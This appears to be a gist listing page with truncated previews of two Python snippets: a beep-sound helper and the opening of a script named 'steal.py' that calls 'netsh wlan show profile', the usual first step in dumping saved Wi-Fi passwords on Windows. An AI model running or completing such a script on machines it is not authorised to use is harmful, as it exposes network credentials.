This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #-*- coding: utf-8 -*- | |
| # python 3.x | |
| '''run with chcp 65001 & python steal.py''' | |
| import subprocess as sp | |
| import re | |
| import sys | |
| base_cmd = ['netsh', 'wlan', 'show', 'profile'] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import winsound as ws | |
| from SRT import SRT | |
| import time | |
| import random | |
| def beepsound(): | |
| freq = 2000 # range : 37 ~ 32767 | |
| dur = 1000 # ms | |
| ws.Beep(freq, dur) # winsound.Beep(frequency, duration) |
NewerOlder